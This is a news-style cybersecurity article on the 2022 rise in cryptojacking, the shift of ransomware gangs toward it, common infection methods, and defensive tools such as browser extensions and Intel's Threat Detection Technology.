Skittish ransomware gangs looking for easier paydays help drive the recent uptick in illegal cryptocurrency mining.
Despite a precipitous drop in cryptocurrency values over the past several months, cryptojacking remains a growth industry for malicious actors. Cybersecurity analysts believe some of that growth is being driven by ransomware gangs seeking less-risky revenue streams.
Global cryptojacking volume rose by 30 percent in the first half of 2022, while ransomware attacks have trended downward, according to the 2022 SonicWall Cyber Threat Report. The security firm suggests that increased international law enforcement efforts, including the arrests of several members of the notorious REvil gang, have ransomware gangs looking for an easier payday.
“Unlike ransomware, which announces its presence and relies heavily on communication with victims, cryptojacking can succeed without the victim ever being aware of it,” the SonicWall analysts wrote. “And for some cybercriminals feeling the heat, the lower risk is worth sacrificing a potentially higher payday.”
Easy Pickings
Cryptojacking is the unauthorized use of a computer, mobile device or server to mine cryptocurrencies. Hackers typically gain access to the device by using an email phishing scam to trick someone into clicking a malicious link, which triggers the download of cryptomining code on the device.
From the criminal’s perspective, it’s a lot easier than ransomware. With cryptojacking, there’s no need to strongarm victims into paying a ransom — every infected computer continuously pays off by mining cryptocurrency. Cryptojacking is also more difficult to detect and trace, and victims aren’t as likely to report incidents. Plus, it requires very little technical skill —cryptojacking kits are available on the dark web for as little as $30.
In fact, crypto miners are now the most common malware threat, with more than 150,000 detected during 2021. In a July report, the Federal Bureau of Investigation said it had identified 244 victims of various crypto-related cybercrimes with an estimated loss of $42.7 million since the beginning of the year.
Another factor contributing to the increase in cryptojacking is the Log4j vulnerability. Within days of the flaw’s discovery on Dec. 9, security firms detected hundreds of thousands of attempts to remotely inject coin-miner malware on corporate networks. Worse yet, analysts said the cryptojacking software increasingly includes additional malicious payloads designed to exfiltrate data from compromised systems.
New Techniques
Meanwhile, Microsoft reports it detects cryptomining malware on hundreds of thousands of endpoints every month via its Windows antivirus service. The company warns that these threats are becoming increasingly complex and evasive, using a variety of techniques to infect a device. The three most common approaches are:
- Executable: These attacks typically leverage phishing or other social engineering techniques to implant malicious applications or executable files on unsuspecting users’ devices. The malware then uses system resources to mine cryptocurrencies.
- Browser-based: These miners are injected into legitimate websites, consuming resources through a user’s web browser for as long as the browser is open to that site.
- Fileless: These stealthy threats perform mining in a device’s memory and achieve persistence by hijacking tools such as “living-off-the-land binaries” (LOLBins) to evade detection. LOLBins are legitimate utilities, libraries and other tools that are native to a given computing environment.
Microsoft reports that many of the cryptojacking threats it is monitoring use the fileless approach. Additionally, it reports that 85 percent of the fileless attacks leverage the Notepad text editor common to all Windows machines. Because Notepad is always available, users wouldn’t think twice about seeing it in a list of running processes.
Because no code is stored on the user’s computer and miners do no obvious damage to the device or data, cryptojacking is extremely hard to detect. Users might notice performance degradation, but it typically isn’t severe.
Nevertheless, the impact of cryptojacking is significant. In addition to diminishing user productivity, always-running crypto mining processes can overheat batteries and destabilize other system components. Organizations can end up dedicating a lot of time, money and resources to investigating performance problems and even replacing system components in an attempt to resolve the issue.
Identify and Block Threats
User education is one of the keys to reducing the risk of cryptojacking. Employees should understand what it is, how it spreads and the damage that can be done. Because devices can be exposed when users visit legitimate websites, organizations should also consider implementing anti-cryptojacking browser extensions such as No Coin and MinerBlock to help users detect and block these threats.
Intel’s Threat Detection Technology (TDT) is a very effective solution for exposing hidden crypto miners. Leveraging machine learning capabilities, TDT constantly scans CPUs and analyzes signals to detect patterns suggesting cryptojacking activity. Because this workload is offloaded to an integrated graphics processing unit, there’s no impact on system performance. When threats are detected, TDT sends a high-fidelity signal that triggers remediation workflows from endpoint detection and response solutions. For example, Microsoft Defender for Endpoint leverages TDT to identify and block cryptojacking threats at the software level.
Cryptojacking is a growing threat that can sap system performance and even damage equipment. It can also come with more malicious malware that exfiltrates data. Organizations should take steps to detect and block this insidious threat.
